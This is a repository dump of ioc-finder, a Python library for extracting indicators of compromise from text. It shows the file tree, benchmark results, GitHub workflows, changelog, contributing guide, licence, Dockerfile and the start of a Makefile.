├── .benchmarks └── Linux-CPython-3.10-64bit │ └── 0001_benchmark.json ├── .codacy.yml ├── .coveragerc ├── .editorconfig ├── .github ├── dependabot.yml └── workflows │ ├── ci.yml │ ├── docs.yml │ ├── lint.yml │ └── python-publish.yml ├── .gitignore ├── CHANGELOG.md ├── CONTRIBUTING.rst ├── COPYING ├── COPYING.LESSER ├── Dockerfile ├── MANIFEST.in ├── Makefile ├── README.md ├── docker-compose.yml ├── docker └── lint.sh ├── docs ├── development.md ├── index.md ├── overrides │ └── main.html └── quick-start.md ├── ioc_finder ├── __init__.py ├── data.py ├── ioc_finder.py └── ioc_grammars.py ├── mkdocs.yml ├── mypy.ini ├── pyproject.toml ├── requirements.txt ├── requirements_dev.txt ├── setup.cfg ├── setup.py ├── tests ├── __init__.py ├── benchmarks.py ├── data │ └── long-article-1.txt ├── find_iocs_cases │ ├── __init__.py │ ├── asns.py │ ├── attack_data.py │ ├── coins.py │ ├── cves.py │ ├── domains.py │ ├── email.py │ ├── feature__included_ioc_types.py │ ├── file_paths.py │ ├── hashes.py │ ├── ids.py │ ├── ip_addr.py │ ├── mac_addr.py │ ├── registry_keys.py │ ├── tlp_labels.py │ ├── urls.py │ └── user_agents.py ├── test_cli.py ├── test_concurrency.py ├── test_edge_cases.py ├── test_execution_time.py ├── test_find_iocs.py ├── test_ioc_finder.py ├── test_odd_ip_address_formats.py ├── test_parsing_functions.py ├── test_urls.py ├── test_utility_functions.py └── test_with_hypothesis.py └── utility.py /.benchmarks/Linux-CPython-3.10-64bit/0001_benchmark.json: -------------------------------------------------------------------------------- 1 | { 2 | "machine_info": { 3 | "node": "27a13e4be0d8", 4 | "processor": "", 5 | "machine": "x86_64", 6 | "python_compiler": "GCC 8.3.0", 7 | "python_implementation": "CPython", 8 | "python_implementation_version": "3.10.2", 9 | "python_version": "3.10.2", 10 | "python_build": [ 11 | "main", 12 | "Mar 2 2022 03:58:56" 13 | ], 14 | "release": "5.10.104-linuxkit", 15 | "system": "Linux", 16 | "cpu": { 17 | "python_version": "3.10.2.final.0 (64 bit)", 18 | "cpuinfo_version": [ 19 | 9, 20 | 0, 21 | 0 22 | ], 23 | "cpuinfo_version_string": "9.0.0", 24 | "arch": "X86_64", 25 | "bits": 64, 26 | "count": 2, 27 | "arch_string_raw": "x86_64", 28 | "vendor_id_raw": "GenuineIntel", 29 | "brand_raw": "Intel(R) Core(TM) i7-5650U CPU @ 2.20GHz", 30 | "hz_advertised_friendly": "2.2000 GHz", 31 | "hz_actual_friendly": "2.1983 GHz", 32 | "hz_advertised": [ 33 | 2200000000, 34 | 0 35 | ], 36 | "hz_actual": [ 37 | 2198316000, 38 | 0 39 | ], 40 | "stepping": 4, 41 | "model": 61, 42 | "family": 6, 43 | "flags": [ 44 | "3dnowprefetch", 45 | "abm", 46 | "aes", 47 | "apic", 48 | "arat", 49 | "avx", 50 | "avx2", 51 | "bmi1", 52 | "bmi2", 53 | "clflush", 54 | "cmov", 55 | "constant_tsc", 56 | "cpuid", 57 | "cx16", 58 | "cx8", 59 | "de", 60 | "ds_cpl", 61 | "dtes64", 62 | "erms", 63 | "f16c", 64 | "fma", 65 | "fpu", 66 | "fsgsbase", 67 | "fxsr", 68 | "hle", 69 | "ht", 70 | "hypervisor", 71 | "lahf_lm", 72 | "lm", 73 | "mca", 74 | "mce", 75 | "mmx", 76 | "movbe", 77 | "msr", 78 | "mtrr", 79 | "nonstop_tsc", 80 | "nopl", 81 | "nx", 82 | "osxsave", 83 | "pae", 84 | "pat", 85 | "pbe", 86 | "pcid", 87 | "pclmulqdq", 88 | "pdpe1gb", 89 | "pge", 90 | "pni", 91 | "popcnt", 92 | "pse", 93 | "pse36", 94 | "rdrand", 95 | "rdrnd", 96 | "rep_good", 97 | "rtm", 98 | "sdbg", 99 | "sep", 100 | "ss", 101 | "sse", 102 | "sse2", 103 | "sse4_1", 104 | "sse4_2", 105 | "ssse3", 106 | "syscall", 107 | "tsc", 108 | "vme", 109 | "xsave", 110 | "xsaveopt", 111 | "xtopology", 112 | "xtpr" 113 | ], 114 | "l3_cache_size": 4194304, 115 | "l2_cache_size": 262144, 116 | "l1_data_cache_size": 32768, 117 | "l1_instruction_cache_size": 32768, 118 | "l2_cache_line_size": 256, 119 | "l2_cache_associativity": 6 120 | } 121 | }, 122 | "commit_info": { 123 | "id": "3ec2e9bf011ed508b7994ac1dafc94d73d0f2269", 124 | "time": "2022-07-08T04:22:31-04:00", 125 | "author_time": "2022-07-08T04:22:31-04:00", 126 | "dirty": true, 127 | "project": "ioc-finder", 128 | "branch": "main" 129 | }, 130 | "benchmarks": [ 131 | { 132 | "group": null, 133 | "name": "test_benchmarks", 134 | "fullname": "code/tests/benchmarks.py::test_benchmarks", 135 | "params": null, 136 | "param": null, 137 | "extra_info": {}, 138 | "options": { 139 | "disable_gc": false, 140 | "timer": "perf_counter", 141 | "min_rounds": 5, 142 | "max_time": 1.0, 143 | "min_time": 5e-06, 144 | "warmup": false 145 | }, 146 | "stats": { 147 | "min": 6.62307798400002, 148 | "max": 11.762176740999962, 149 | "mean": 7.822174038599973, 150 | "stddev": 2.210649363715684, 151 | "rounds": 5, 152 | "median": 7.011211251999953, 153 | "iqr": 1.5581442862500126, 154 | "q1": 6.661986278499967, 155 | "q3": 8.22013056474998, 156 | "iqr_outliers": 1, 157 | "stddev_outliers": 1, 158 | "outliers": "1;1", 159 | "ld15iqr": 6.62307798400002, 160 | "hd15iqr": 11.762176740999962, 161 | "ops": 0.12784169657505878, 162 | "total": 39.11087019299987, 163 | "iterations": 1 164 | } 165 | }, 166 | { 167 | "group": null, 168 | "name": "test_parse_urls", 169 | "fullname": "code/tests/benchmarks.py::test_parse_urls", 170 | "params": null, 171 | "param": null, 172 | "extra_info": {}, 173 | "options": { 174 | "disable_gc": false, 175 | "timer": "perf_counter", 176 | "min_rounds": 5, 177 | "max_time": 1.0, 178 | "min_time": 5e-06, 179 | "warmup": false 180 | }, 181 | "stats": { 182 | "min": 0.5990572059999977, 183 | "max": 0.6238025569999763, 184 | "mean": 0.6069684945999825, 185 | "stddev": 0.010547151800779047, 186 | "rounds": 5, 187 | "median": 0.6011302180000939, 188 | "iqr": 0.014412642249965302, 189 | "q1": 0.5997208337499558, 190 | "q3": 0.6141334759999211, 191 | "iqr_outliers": 0, 192 | "stddev_outliers": 1, 193 | "outliers": "1;0", 194 | "ld15iqr": 0.5990572059999977, 195 | "hd15iqr": 0.6238025569999763, 196 | "ops": 1.6475319705993006, 197 | "total": 3.0348424729999124, 198 | "iterations": 1 199 | } 200 | } 201 | ], 202 | "datetime": "2022-11-03T09:41:08.251239", 203 | "version": "3.4.1" 204 | } -------------------------------------------------------------------------------- /.codacy.yml: -------------------------------------------------------------------------------- 1 | exclude_paths: 2 | - tests/** -------------------------------------------------------------------------------- /.coveragerc: -------------------------------------------------------------------------------- 1 | [run] 2 | omit = 3 | .tox/* 4 | tests/* 5 | setup.py 6 | utility.py 7 | -------------------------------------------------------------------------------- /.editorconfig: -------------------------------------------------------------------------------- 1 | # http://editorconfig.org 2 | 3 | root = true 4 | 5 | [*] 6 | indent_style = space 7 | indent_size = 4 8 | trim_trailing_whitespace = true 9 | insert_final_newline = true 10 | charset = utf-8 11 | end_of_line = lf 12 | 13 | [*.bat] 14 | indent_style = tab 15 | end_of_line = crlf 16 | 17 | [LICENSE] 18 | insert_final_newline = false 19 | 20 | [Makefile] 21 | indent_style = tab 22 | 23 | [{.travis.yml}] 24 | indent_style = space 25 | indent_size = 2 26 | -------------------------------------------------------------------------------- /.github/dependabot.yml: -------------------------------------------------------------------------------- 1 | version: 2 2 | updates: 3 | - package-ecosystem: "pip" 4 | directory: "/" 5 | schedule: 6 | interval: "weekly" 7 | -------------------------------------------------------------------------------- /.github/workflows/ci.yml: -------------------------------------------------------------------------------- 1 | # This workflow will install Python dependencies, run tests and lint with a variety of Python versions 2 | # For more information see: https://help.github.com/actions/language-and-framework-guides/using-python-with-github-actions 3 | 4 | name: CI 5 | 6 | on: 7 | push: 8 | branches: [ main ] 9 | pull_request: 10 | branches: [ main ] 11 | 12 | jobs: 13 | build_multi_os: 14 | runs-on: ${{ matrix.os }} 15 | strategy: 16 | matrix: 17 | os: [macos-latest, windows-latest, ubuntu-latest] 18 | python-version: ['3.10'] 19 | 20 | steps: 21 | - uses: actions/checkout@v2 22 | - name: Set up Python ${{ matrix.python-version }} 23 | uses: actions/setup-python@v2 24 | with: 25 | python-version: ${{ matrix.python-version }} 26 | - name: Install dependencies 27 | run: | 28 | python -m pip install -r requirements.txt 29 | python -m pip install -r requirements_dev.txt 30 | - name: Run pytest 31 | run: | 32 | pytest 33 | codecov 34 | # run benchmark tests 35 | pytest -c "." --benchmark-storage=.benchmarks/Linux-CPython-3.10-64bit/ --benchmark-compare=0001 --benchmark-compare-fail=mean:10% --benchmark-columns='mean,median,stddev,iqr' tests/benchmarks.py 36 | 37 | build_multi_py_versions: 38 | runs-on: ${{ matrix.os }} 39 | strategy: 40 | matrix: 41 | os: [ubuntu-latest] 42 | python-version: ['3.7', '3.8', '3.9', '3.10'] 43 | 44 | steps: 45 | - uses: actions/checkout@v2 46 | - name: Set up Python ${{ matrix.python-version }} 47 | uses: actions/setup-python@v2 48 | with: 49 | python-version: ${{ matrix.python-version }} 50 | - name: Install dependencies 51 | run: | 52 | python -m pip install -r requirements.txt 53 | python -m pip install -r requirements_dev.txt 54 | - name: Run pytest 55 | run: | 56 | pytest 57 | codecov 58 | -------------------------------------------------------------------------------- /.github/workflows/docs.yml: -------------------------------------------------------------------------------- 1 | name: Docs 2 | 3 | on: 4 | push: 5 | branches: [ main ] 6 | 7 | jobs: 8 | mkdocs-deploy: 9 | runs-on: ubuntu-latest 10 | steps: 11 | - uses: actions/checkout@v2 12 | - uses: actions/setup-python@v2 13 | with: 14 | python-version: 3.x 15 | - run: pip install mkdocs-material 16 | - run: mkdocs gh-deploy --force 17 | -------------------------------------------------------------------------------- /.github/workflows/lint.yml: -------------------------------------------------------------------------------- 1 | # This workflow will install Python dependencies, run tests and lint with a variety of Python versions 2 | # For more information see: https://help.github.com/actions/language-and-framework-guides/using-python-with-github-actions 3 | 4 | name: Lint 5 | 6 | on: 7 | push: 8 | branches: [ main ] 9 | pull_request: 10 | branches: [ main ] 11 | 12 | jobs: 13 | build: 14 | runs-on: ubuntu-latest 15 | steps: 16 | - uses: actions/checkout@v2 17 | - name: Set up Python 18 | uses: actions/setup-python@v2 19 | with: 20 | python-version: '3.10' 21 | - name: Install dependencies 22 | run: | 23 | python -m pip install -r requirements.txt 24 | python -m pip install -r requirements_dev.txt 25 | - name: Lint 26 | env: 27 | CONTEXT: ci 28 | run: ./docker/lint.sh 29 | -------------------------------------------------------------------------------- /.github/workflows/python-publish.yml: -------------------------------------------------------------------------------- 1 | # This workflow will upload a Python Package using Twine when a release is created 2 | # For more information see: https://help.github.com/en/actions/language-and-framework-guides/using-python-with-github-actions#publishing-to-package-registries 3 | 4 | name: Upload Python Package to PyPi 5 | 6 | on: 7 | push: 8 | tags: 9 | - 'v*' 10 | 11 | jobs: 12 | deploy: 13 | 14 | runs-on: ubuntu-latest 15 | 16 | steps: 17 | - uses: actions/checkout@v2 18 | - name: Set up Python 19 | uses: actions/setup-python@v2 20 | with: 21 | python-version: '3.x' 22 | - name: Install dependencies 23 | run: | 24 | python -m pip install --upgrade pip 25 | pip install setuptools wheel twine 26 | - name: Build and publish 27 | env: 28 | TWINE_USERNAME: ${{ secrets.PYPI_USERNAME }} 29 | TWINE_PASSWORD: ${{ secrets.PYPI_PASSWORD }} 30 | run: | 31 | python setup.py sdist bdist_wheel 32 | twine upload dist/* 33 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | # Byte-compiled / optimized / DLL files 2 | __pycache__/ 3 | *.py[cod] 4 | *$py.class 5 | 6 | # C extensions 7 | *.so 8 | 9 | # Distribution / packaging 10 | .Python 11 | env/ 12 | build/ 13 | develop-eggs/ 14 | dist/ 15 | downloads/ 16 | eggs/ 17 | .eggs/ 18 | lib/ 19 | lib64/ 20 | parts/ 21 | sdist/ 22 | var/ 23 | *.egg-info/ 24 | .installed.cfg 25 | *.egg 26 | 27 | # PyInstaller 28 | # Usually these files are written by a python script from a template 29 | # before PyInstaller builds the exe, so as to inject date/other infos into it. 30 | *.manifest 31 | *.spec 32 | 33 | # Installer logs 34 | pip-log.txt 35 | pip-delete-this-directory.txt 36 | 37 | # Unit test / coverage reports 38 | htmlcov/ 39 | .tox/ 40 | .coverage 41 | .coverage.* 42 | .cache 43 | nosetests.xml 44 | coverage.xml 45 | *,cover 46 | .hypothesis/ 47 | 48 | # Translations 49 | *.mo 50 | *.pot 51 | 52 | # Django stuff: 53 | *.log 54 | 55 | # Sphinx documentation 56 | docs/_build/ 57 | 58 | # PyBuilder 59 | target/ 60 | 61 | # pyenv python configuration file 62 | .python-version 63 | 64 | # Cookie cutter packaging file 65 | travis_pypi_setup.py 66 | Pipfile 67 | Pipfile.lock 68 | -------------------------------------------------------------------------------- /CHANGELOG.md: -------------------------------------------------------------------------------- 1 | # Changelog 2 | 3 | All notable changes to this project will be documented in this file. 4 | 5 | The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.0.0/), and this project adheres to [Semantic Versioning](https://semver.org/). 6 | 7 | ## [7.3.0] - 2022.12.22 8 | 9 | ### Changed 10 | 11 | - To speed URL parsing, we no longer parse URLs with `userinfo "@"` in the authority (see [URL syntax guide for more details](https://en.wikipedia.org/wiki/URL#Syntax)) 12 | - Our reasoning is that userinfo is rarely present 13 | - If you have concerns about this change or would like to see it added back in (it could be optionally enabled), please raise an issue 14 | 15 | ## [7.2.4] - 2022.08.25 16 | 17 | ### Fixed 18 | 19 | - URL boundary to better respect the conventions of human language regarding quotation marks and parentheses ([#130](https://github.com/fhightower/ioc-finder/issues/130)) 20 | 21 | ## [7.2.3] - 2022.07.14 22 | 23 | ### Fixed 24 | 25 | - Update required version of [ioc-fanger](https://github.com/ioc-fang/ioc-fanger) which fixes issues with non-http(s) URL schemes ([#255](https://github.com/fhightower/ioc-finder/issues/255)) 26 | 27 | ## [7.2.2] - 2022.07.08 28 | 29 | ### Fixed 30 | 31 | - Poorly designed grammars which were SIGNIFICANTLY slowing down this project ([#250](https://github.com/fhightower/ioc-finder/pull/250)) 32 | - **🎉 This update improves mean run-times by [≈70%](https://github.com/fhightower/ioc-finder/pull/253/files#diff-8e67b346e4b32f0cd637dbd271c16ab649c05fdf6aa7fe443cc85c0d8ca6ad07R149)!** 33 | - Thanks to @ptmcg for his contribution! 34 | 35 | ## [7.2.1] - 2022.07.05 36 | 37 | ### Fixed 38 | 39 | - Removed duplicative function calls 40 | 41 | ## [7.2.0] - 2022.06.20 42 | 43 | ### Changed 44 | 45 | - *Possible breaking change:* Update required pyparsing version to [v3](https://github.com/pyparsing/pyparsing/blob/966d6fded149c6c11993746b0d72166bc04e4504/CHANGES#L49) 46 | - Although there are no public API changes associated with this version, this may be a breaking change if you are using ioc-finder and have pyparsing pinned to a version less than v3 47 | - I've chosen to release this as a new minor version b/c I think requirement version updates w/ no API changes and no system requirement changes constitute a minor version change 48 | - Updated parsing of Google Analytics Tracker IDs so that matched must be all lower-cased or all upper-cased (e.g. `ua-...` and `UA-...` will be matched, but `uA-...` will not) (this makes the parsing consistent with how Google Adsense Publisher IDs are parsed) 49 | 50 | ## [7.1.0] - 2022.06.13 51 | 52 | ### Added 53 | 54 | - `included_ioc_types` option to only parse specified IOC types ([#218](https://github.com/fhightower/ioc-finder/issues/218)) 55 | 56 | ### Changed 57 | 58 | - Imphashes are no longer parsed as md5s even when `parse_imphashes` is False ([#231](https://github.com/fhightower/ioc-finder/issues/231)) 59 | - Authentihashes are no longer parsed as sha256s even when `parse_authentihashes` is False ([#231](https://github.com/fhightower/ioc-finder/issues/231)) 60 | 61 | ## [7.0.0] - 2022.05.27 62 | 63 | ### Added 64 | 65 | - Support for Python 3.10 ([#188](https://github.com/fhightower/ioc-finder/issues/188)) 66 | 67 | ### Removed 68 | 69 | - Phone number parsing ([#155](https://github.com/fhightower/ioc-finder/issues/155)) 70 | - Support for Python 3.6 ([#187](https://github.com/fhightower/ioc-finder/issues/187)) 71 | 72 | ## [6.0.1] - 2021.06.09 73 | 74 | ### Fixed 75 | 76 | - ASN grammar improved reduce false positives by not matching on lower-case `"as "` ([#136](https://github.com/fhightower/ioc-finder/issues/136)) 77 | 78 | ## [6.0.0] - 2021.05.20 79 | 80 | ### Changed 81 | 82 | - Made all boolean arguments keyword-only arguments ([#108](https://github.com/fhightower/ioc-finder/issues/108)) 83 | - Converting data from lists to tuples ([#110](https://github.com/fhightower/ioc-finder/issues/110)) 84 | - Made `_prepare_text` function public (`prepare_text`) ([#114](https://github.com/fhightower/ioc-finder/issues/114)) 85 | - Renamed `no_urls_without_schemes` to `parse_urls_without_scheme` ([#109](https://github.com/fhightower/ioc-finder/issues/109)) 86 | - Moved from MIT License to [GNU Lesser General Public License v3.0](https://choosealicense.com/licenses/lgpl-3.0/) ([#113](https://github.com/fhightower/ioc-finder/issues/113)) 87 | 88 | ### Fixed 89 | 90 | - Unquoting URLs appropriately ([#104](https://github.com/fhightower/ioc-finder/issues/104)) 91 | - Pinned specific [ioc-fanger](https://github.com/ioc-fang/ioc-fanger) version (this prevents an error where ioc-fanger was removing a URL in the query parameter of another URL - see [#104](https://github.com/fhightower/ioc-finder/issues/104)) 92 | 93 | ## [5.0.3] - 2021.04.09 94 | 95 | ### Fixed 96 | 97 | - Unquoting URLs appropriately ([#104](https://github.com/fhightower/ioc-finder/issues/104)) 98 | - Pinned specific [ioc-fanger](https://github.com/ioc-fang/ioc-fanger) version (this prevents an error where ioc-fanger was removing a URL in the query parameter of another URL - see [#104](https://github.com/fhightower/ioc-finder/issues/104)) 99 | 100 | ## [5.0.2] - 2021.04.02 101 | 102 | ### Changed 103 | 104 | - [Improved URL grammar](https://github.com/fhightower/ioc-finder/commit/e3025c1a578663f693e7aa7947ac56e577dde0e9) 105 | 106 | ### Fixed 107 | 108 | - Updating library such that CIDR ranges are not detected as URLs when `parse_urls_without_scheme=True` (see [#91](https://github.com/fhightower/ioc-finder/issues/91)) 109 | - Parse observables from URL path when `parse_domain_from_url=False` and `parse_from_url_path=True` (see [#90](https://github.com/fhightower/ioc-finder/issues/90)) 110 | 111 | ## [5.0.1] - 2021.01.11 112 | 113 | ### Changed 114 | 115 | - Improved word boundary (specifically of MAC address and IP address grammars) 116 | 117 | ## [5.0.0] - 2020.09.25 118 | 119 | ### Removed 120 | 121 | - Concurrency (through the use of concurrent.futures) 122 | 123 | ## [4.0.2] - 2020.09.18 124 | 125 | ### Added 126 | 127 | - Added parsing Monero addresses (see #94) 128 | 129 | ### Changed 130 | 131 | - Simplifying `_remove_url_paths` (a function used behind the scenes by the ioc finder - see #70) 132 | - Created a function to update top level domains (see #10) 133 | - Updating top level domains (which are used in grammars to find network observables) 134 | 135 | ## [4.0.1] - 2020.09.11 136 | 137 | ### Changed 138 | 139 | - You can now ingest text using the cli. For example, this now works: `cat foo.text | ioc-finder`. 140 | - We now have 100% code coverage!!! 141 | - Adding more keywords so this package is easier to find in pypi 142 | 143 | ## [4.0.0] - 2020.09.09 144 | 145 | ### Changed 146 | 147 | - We are now parsing observables from URL paths by default (see https://github.com/fhightower/ioc-finder/issues/87). If you would like to disable this functionality, you may do so by setting the `parse_from_url_path` keyword argument to `False` when calling the `find_iocs` function (e.g. `parse_from_url_path=False`). 148 | 149 | ## <= 3.1.2 - 2020.08.29 150 | 151 | The change log was added for version 3.1.2 152 | -------------------------------------------------------------------------------- /CONTRIBUTING.rst: -------------------------------------------------------------------------------- 1 | .. highlight:: shell 2 | 3 | ************ 4 | Contributing 5 | ************ 6 | 7 | Contributions are welcome, and they are greatly appreciated! Every 8 | little bit helps, and credit will always be given. 9 | 10 | You can contribute in many ways: 11 | 12 | Types of Contributions 13 | ====================== 14 | 15 | Report Bugs 16 | ----------- 17 | 18 | Report bugs at https://github.com/fhightower/ioc-finder/issues. 19 | 20 | If you are reporting a bug, please include: 21 | 22 | * Your operating system name and version. 23 | * Any details about your local setup that might be helpful in troubleshooting. 24 | * Detailed steps to reproduce the bug. 25 | 26 | Fix Bugs 27 | -------- 28 | 29 | Look through the GitHub issues for bugs. Anything tagged with "bug" 30 | and "help wanted" is open to whoever wants to implement it. 31 | 32 | Implement Features 33 | ------------------ 34 | 35 | Look through the GitHub issues for features. Anything tagged with "enhancement" 36 | and "help wanted" is open to whoever wants to implement it. 37 | 38 | Write Documentation 39 | ------------------- 40 | 41 | IOC Finder could always use more documentation, whether as part of the 42 | official IOC Finder docs, in docstrings, or even on the web in blog posts, 43 | articles, and such. 44 | 45 | Submit Feedback 46 | --------------- 47 | 48 | The best way to send feedback is to file an issue at https://github.com/fhightower/ioc-finder/issues. 49 | 50 | If you are proposing a feature: 51 | 52 | * Explain in detail how it would work. 53 | * Keep the scope as narrow as possible, to make it easier to implement. 54 | * Remember that this is a volunteer-driven project, and that contributions 55 | are welcome :) 56 | 57 | Get Started! 58 | ============== 59 | 60 | Ready to contribute? Here's how to set up `ioc_finder` for local development. 61 | 62 | 1. Fork the `ioc_finder` repo on GitHub. 63 | 2. Clone your fork locally:: 64 | 65 | $ git clone git@github.com:/ioc_finder.git 66 | 67 | 3. Install your local copy into a virtualenv. Assuming you have virtualenvwrapper installed, this is how you set up your fork for local development:: 68 | 69 | $ mkvirtualenv ioc_finder 70 | $ cd ioc_finder/ 71 | $ python setup.py develop 72 | 73 | 4. Create a branch for local development:: 74 | 75 | $ git checkout -b name-of-your-bugfix-or-feature 76 | 77 | Now you can make your changes locally. 78 | 79 | 5. When you're done making changes, check that your changes pass flake8 and the tests, including testing other Python versions with tox:: 80 | 81 | $ flake8 ioc_finder tests 82 | $ python setup.py test or py.test 83 | $ tox 84 | 85 | To get flake8 and tox, just pip install them into your virtualenv. 86 | 87 | 6. Commit your changes and push your branch to GitHub:: 88 | 89 | $ git add . 90 | $ git commit -m "Your detailed description of your changes." 91 | $ git push origin name-of-your-bugfix-or-feature 92 | 93 | 7. Submit a pull request through the GitHub website. 94 | 95 | Pull Request Guidelines 96 | ======================= 97 | 98 | Before you submit a pull request, check that it meets these guidelines: 99 | 100 | 1. The pull request should include tests. 101 | 2. If the pull request adds functionality, the docs should be updated. Put 102 | your new functionality into a function with a docstring, and add the 103 | feature to the list in README.md. 104 | 3. The pull request should work for Python 2.6, 2.7, 3.3, 3.4 and 3.5, and for PyPy. Check 105 | https://travis-ci.org/fhightower/ioc-finder/pull_requests 106 | and make sure that the tests pass for all supported Python versions. 107 | 108 | Tips 109 | ---- 110 | 111 | To run a subset of tests:: 112 | 113 | $ py.test tests.test_ioc_finder 114 | 115 | -------------------------------------------------------------------------------- /COPYING.LESSER: -------------------------------------------------------------------------------- 1 | GNU LESSER GENERAL PUBLIC LICENSE 2 | Version 3, 29 June 2007 3 | 4 | Copyright (C) 2007 Free Software Foundation, Inc. 5 | Everyone is permitted to copy and distribute verbatim copies 6 | of this license document, but changing it is not allowed. 7 | 8 | 9 | This version of the GNU Lesser General Public License incorporates 10 | the terms and conditions of version 3 of the GNU General Public 11 | License, supplemented by the additional permissions listed below. 12 | 13 | 0. Additional Definitions. 14 | 15 | As used herein, "this License" refers to version 3 of the GNU Lesser 16 | General Public License, and the "GNU GPL" refers to version 3 of the GNU 17 | General Public License. 18 | 19 | "The Library" refers to a covered work governed by this License, 20 | other than an Application or a Combined Work as defined below. 21 | 22 | An "Application" is any work that makes use of an interface provided 23 | by the Library, but which is not otherwise based on the Library. 24 | Defining a subclass of a class defined by the Library is deemed a mode 25 | of using an interface provided by the Library. 26 | 27 | A "Combined Work" is a work produced by combining or linking an 28 | Application with the Library. The particular version of the Library 29 | with which the Combined Work was made is also called the "Linked 30 | Version". 31 | 32 | The "Minimal Corresponding Source" for a Combined Work means the 33 | Corresponding Source for the Combined Work, excluding any source code 34 | for portions of the Combined Work that, considered in isolation, are 35 | based on the Application, and not on the Linked Version. 36 | 37 | The "Corresponding Application Code" for a Combined Work means the 38 | object code and/or source code for the Application, including any data 39 | and utility programs needed for reproducing the Combined Work from the 40 | Application, but excluding the System Libraries of the Combined Work. 41 | 42 | 1. Exception to Section 3 of the GNU GPL. 43 | 44 | You may convey a covered work under sections 3 and 4 of this License 45 | without being bound by section 3 of the GNU GPL. 46 | 47 | 2. Conveying Modified Versions. 48 | 49 | If you modify a copy of the Library, and, in your modifications, a 50 | facility refers to a function or data to be supplied by an Application 51 | that uses the facility (other than as an argument passed when the 52 | facility is invoked), then you may convey a copy of the modified 53 | version: 54 | 55 | a) under this License, provided that you make a good faith effort to 56 | ensure that, in the event an Application does not supply the 57 | function or data, the facility still operates, and performs 58 | whatever part of its purpose remains meaningful, or 59 | 60 | b) under the GNU GPL, with none of the additional permissions of 61 | this License applicable to that copy. 62 | 63 | 3. Object Code Incorporating Material from Library Header Files. 64 | 65 | The object code form of an Application may incorporate material from 66 | a header file that is part of the Library. You may convey such object 67 | code under terms of your choice, provided that, if the incorporated 68 | material is not limited to numerical parameters, data structure 69 | layouts and accessors, or small macros, inline functions and templates 70 | (ten or fewer lines in length), you do both of the following: 71 | 72 | a) Give prominent notice with each copy of the object code that the 73 | Library is used in it and that the Library and its use are 74 | covered by this License. 75 | 76 | b) Accompany the object code with a copy of the GNU GPL and this license 77 | document. 78 | 79 | 4. Combined Works. 80 | 81 | You may convey a Combined Work under terms of your choice that, 82 | taken together, effectively do not restrict modification of the 83 | portions of the Library contained in the Combined Work and reverse 84 | engineering for debugging such modifications, if you also do each of 85 | the following: 86 | 87 | a) Give prominent notice with each copy of the Combined Work that 88 | the Library is used in it and that the Library and its use are 89 | covered by this License. 90 | 91 | b) Accompany the Combined Work with a copy of the GNU GPL and this license 92 | document. 93 | 94 | c) For a Combined Work that displays copyright notices during 95 | execution, include the copyright notice for the Library among 96 | these notices, as well as a reference directing the user to the 97 | copies of the GNU GPL and this license document. 98 | 99 | d) Do one of the following: 100 | 101 | 0) Convey the Minimal Corresponding Source under the terms of this 102 | License, and the Corresponding Application Code in a form 103 | suitable for, and under terms that permit, the user to 104 | recombine or relink the Application with a modified version of 105 | the Linked Version to produce a modified Combined Work, in the 106 | manner specified by section 6 of the GNU GPL for conveying 107 | Corresponding Source. 108 | 109 | 1) Use a suitable shared library mechanism for linking with the 110 | Library. A suitable mechanism is one that (a) uses at run time 111 | a copy of the Library already present on the user's computer 112 | system, and (b) will operate properly with a modified version 113 | of the Library that is interface-compatible with the Linked 114 | Version. 115 | 116 | e) Provide Installation Information, but only if you would otherwise 117 | be required to provide such information under section 6 of the 118 | GNU GPL, and only to the extent that such information is 119 | necessary to install and execute a modified version of the 120 | Combined Work produced by recombining or relinking the 121 | Application with a modified version of the Linked Version. (If 122 | you use option 4d0, the Installation Information must accompany 123 | the Minimal Corresponding Source and Corresponding Application 124 | Code. If you use option 4d1, you must provide the Installation 125 | Information in the manner specified by section 6 of the GNU GPL 126 | for conveying Corresponding Source.) 127 | 128 | 5. Combined Libraries. 129 | 130 | You may place library facilities that are a work based on the 131 | Library side by side in a single library together with other library 132 | facilities that are not Applications and are not covered by this 133 | License, and convey such a combined library under terms of your 134 | choice, if you do both of the following: 135 | 136 | a) Accompany the combined library with a copy of the same work based 137 | on the Library, uncombined with any other library facilities, 138 | conveyed under the terms of this License. 139 | 140 | b) Give prominent notice with the combined library that part of it 141 | is a work based on the Library, and explaining where to find the 142 | accompanying uncombined form of the same work. 143 | 144 | 6. Revised Versions of the GNU Lesser General Public License. 145 | 146 | The Free Software Foundation may publish revised and/or new versions 147 | of the GNU Lesser General Public License from time to time. Such new 148 | versions will be similar in spirit to the present version, but may 149 | differ in detail to address new problems or concerns. 150 | 151 | Each version is given a distinguishing version number. If the 152 | Library as you received it specifies that a certain numbered version 153 | of the GNU Lesser General Public License "or any later version" 154 | applies to it, you have the option of following the terms and 155 | conditions either of that published version or of any later version 156 | published by the Free Software Foundation. If the Library as you 157 | received it does not specify a version number of the GNU Lesser 158 | General Public License, you may choose any version of the GNU Lesser 159 | General Public License ever published by the Free Software Foundation. 160 | 161 | If the Library as you received it specifies that a proxy can decide 162 | whether future versions of the GNU Lesser General Public License shall 163 | apply, that proxy's public statement of acceptance of any version is 164 | permanent authorization for you to choose that version for the 165 | Library. -------------------------------------------------------------------------------- /Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:3.10.2-buster 2 | 3 | ENV PIP_NO_CACHE_DIR "true" 4 | 5 | COPY ./requirements*.txt /code/ 6 | 7 | WORKDIR /code 8 | 9 | RUN pip install -r requirements.txt -r requirements_dev.txt 10 | -------------------------------------------------------------------------------- /MANIFEST.in: -------------------------------------------------------------------------------- 1 | include CONTRIBUTING.rst 2 | include COPYING 3 | include COPYING.LESSER 4 | include README.md 5 | 6 | recursive-include tests * 7 | recursive-exclude * __pycache__ 8 | recursive-exclude * *.py[co] 9 | 10 | recursive-include docs *.rst conf.py Makefile make.bat *.jpg *.png *.gif -------------------------------------------------------------------------------- /Makefile: -------------------------------------------------------------------------------- 1 | .PHONY: clean clean-test clean-pyc clean-build docs help 2 | .DEFAULT_GOAL := help 3 | define BROWSER_PYSCRIPT 4 | import os, webbrowser, sys 5 | try: 6 | from urllib import pathname2url 7 | except: 8 | from urllib.request import pathname2url 9 | 10 | webbrowser.open("file://" + pathname2url(os.path.abspath(sys.argv[1]))) 11 | endef 12 | export BROWSER_PYSCRIPT 13 | 14 | define PRINT_HELP_PYSCRIPT 15 | import re, sys 16 | 17 | for line in sys.stdin: 18 | match = re.match(r'^([a-zA-Z_-]+):.*?## (.*)$$', line) 19 | if match: 20 | target, help = 